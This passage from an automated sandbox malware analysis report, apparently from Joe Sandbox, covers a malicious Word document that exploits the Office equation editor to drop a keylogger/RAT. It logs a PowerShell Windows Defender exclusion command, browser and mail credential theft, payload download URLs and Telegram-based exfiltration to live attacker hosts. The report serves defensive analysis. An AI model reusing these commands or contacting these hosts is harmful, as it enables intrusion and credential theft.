                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeWindow / User API: threadDelayed 9196Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeWindow / User API: threadDelayed 608Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3792Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 3852Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2240Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2476Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4060Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 2992Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1424Thread sleep time: -14757395258967632s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1424Thread sleep time: -1200000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1844Thread sleep count: 9196 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exe TID: 1844Thread sleep count: 608 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe"
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeMemory written: C:\Users\user\AppData\Roaming\millitingacy20306.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\millitingacy20306.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeProcess created: C:\Users\user\AppData\Roaming\millitingacy20306.exe "C:\Users\user\AppData\Roaming\millitingacy20306.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeQueries volume information: C:\Users\user\AppData\Roaming\millitingacy20306.exe VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeQueries volume information: C:\Users\user\AppData\Roaming\millitingacy20306.exe VolumeInformationJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Roaming\millitingacy20306.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: Yara matchFile source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 13.2.millitingacy20306.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.33e3600.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.millitingacy20306.exe.3249300.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: millitingacy20306.exe PID: 3832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: millitingacy20306.exe PID: 3952, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts33
                  Exploitation for Client Execution                  		Boot or Logon Initialization Scripts111
                  Process Injection                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  Input Capture                  		13
                  System Information Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		14
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information                  		Security Account Manager1
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Install Root Certificate                  		NTDS1
                  Query Registry                  		Distributed Component Object Model1
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets1
                  Process Discovery                  		SSH1
                  Input Capture                  		24
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials31
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry                  		Proc Filesystem1
                  Remote System Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow1
                  System Network Configuration Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron111
                  Process Injection                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520577 Sample: 0225139776.docx.doc Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 25 other signatures 2->60 8 WINWORD.EXE 314 54 2->8         started        process3 dnsIp4 44 66.63.187.123, 49163, 49164, 49165 ASN-QUADRANET-GLOBALUS United States 8->44 26 C:\Users\user\...\txt on 66.63.187.123.url, MS 8->26 dropped 28 C:\Users\user\AppData\...\millizxc.doc.url, MS 8->28 dropped 30 ~WRF{15013EC6-ED12...F-9B4A7E95BCBA}.tmp, Composite 8->30 dropped 32 2 other malicious files 8->32 dropped 72 Microsoft Office launches external ms-search protocol handler (WebDAV) 8->72 74 Office viewer loads remote template 8->74 76 Microsoft Office drops suspicious files 8->76 13 EQNEDT32.EXE 11 8->13         started        file5 signatures6 process7 file8 34 C:\Users\user\...\millitingacy20306.exe, PE32 13->34 dropped 36 C:\Users\user\...\H363BpKqz0MdVd7[1].exe, PE32 13->36 dropped 78 Office equation editor establishes network connection 13->78 80 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->80 17 millitingacy20306.exe 3 13->17         started        signatures9 process10 signatures11 46 Antivirus detection for dropped file 17->46 48 Multi AV Scanner detection for dropped file 17->48 50 Machine Learning detection for dropped file 17->50 52 2 other signatures 17->52 20 millitingacy20306.exe 12 2 17->20         started        24 powershell.exe 4 17->24         started        process12 dnsIp13 38 reallyfreegeoip.org 20->38 40 api.telegram.org 20->40 42 8 other IPs or domains 20->42 62 Installs new ROOT certificates 20->62 64 Tries to steal Mail credentials (via file / registry access) 20->64 66 Tries to harvest and steal browser information (history, passwords, etc) 20->66 signatures14 68 Tries to detect the country of the analysis system (by using the IP) 38->68 70 Uses the Telegram API (likely for C&C communication) 40->70

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  0225139776.docx.doc37%ReversingLabsDocument-Word.Downloader.BadTemplate

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\193318D4.doc100%AviraHEUR/Rtf.Malformed
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\millizxc[1].doc100%AviraHEUR/Rtf.Malformed
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe100%AviraHEUR/AGEN.1309880
                  C:\Users\user\AppData\Roaming\millitingacy20306.exe100%AviraHEUR/AGEN.1309880
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{15013EC6-ED12-459C-8C4F-9B4A7E95BCBA}.tmp100%AviraEXP/CVE-2018-0798.Gen
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\millitingacy20306.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\H363BpKqz0MdVd7[1].exe53%ReversingLabsByteCode-MSIL.Trojan.Zilla
                  C:\Users\user\AppData\Roaming\millitingacy20306.exe53%ReversingLabsByteCode-MSIL.Trojan.Zilla

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://varders.kozow.com:80810%URL Reputationsafe
                  http://checkip.dyndns.org/0%URL Reputationsafe
                  http://checkip.dyndns.org/q0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/0%URL Reputationsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                  http://checkip.dyndns.org0%URL Reputationsafe
                  https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                  http://aborters.duckdns.org:8081100%URL Reputationmalware
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://anotherarmy.dns.army:8081100%URL Reputationmalware
                  https://reallyfreegeoip.org0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  reallyfreegeoip.org
                  		188.114.96.3
                  		truetrue
                    		unknown
                    api.telegram.org
                    		149.154.167.220
                    		truetrue
                      		unknown
                      checkip.dyndns.com
                      		158.101.44.242
                      		truefalse
                        		unknown
                        checkip.dyndns.org
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://66.63.187.123/txt/H363BpKqz0MdVd7.exetrue
                            		unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            		unknown
                            http://66.63.187.123/txt/millizxc.doctrue
                              		unknown
                              https://reallyfreegeoip.org/xml/8.46.123.33false
                              • URL Reputation: safe
                              		unknown
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%209/27/2024%20/%2011:31:56%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabmillitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://duckduckgo.com/ac/?q=millitingacy20306.exe, 0000000D.00000002.951411962.0000000002688000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002647000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.000000000342B000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002675000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002634000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951853308.0000000003477000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmfmillitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://api.telegram.orgmillitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://66.63.187.123/txt/H363BpKqz0MdVd7.exeC:EQNEDT32.EXE, 00000009.00000003.422853483.000000000068B000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.423390296.000000000068C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://api.telegram.org/botmillitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://ocsp.entrust.net03millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.diginotar.nl/cps/pkioverheid0millitingacy20306.exe, 0000000D.00000002.951147462.0000000000272000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20amillitingacy20306.exe, 0000000D.00000002.951411962.000000000256A000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://reallyfreegeoip.org/xml/8.46.123.334millitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002493000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://varders.kozow.com:8081millitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://www.google.com/search?q=wmfmillitingacy20306.exe, 0000000D.00000002.951853308.0000000003512000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://checkip.dyndns.org/qmillitingacy20306.exe, 0000000A.00000002.436244907.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951238233.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://reallyfreegeoip.orgmillitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000246D000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://checkip.dyndns.commillitingacy20306.exe, 0000000D.00000002.951411962.000000000255C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024E8000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.00000000024F5000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002505000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002454000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000253C000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.0000000002512000.00000004.00000800.00020000.00000000.sdmp, millitingacy20306.exe, 0000000D.00000002.951411962.000000000254E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
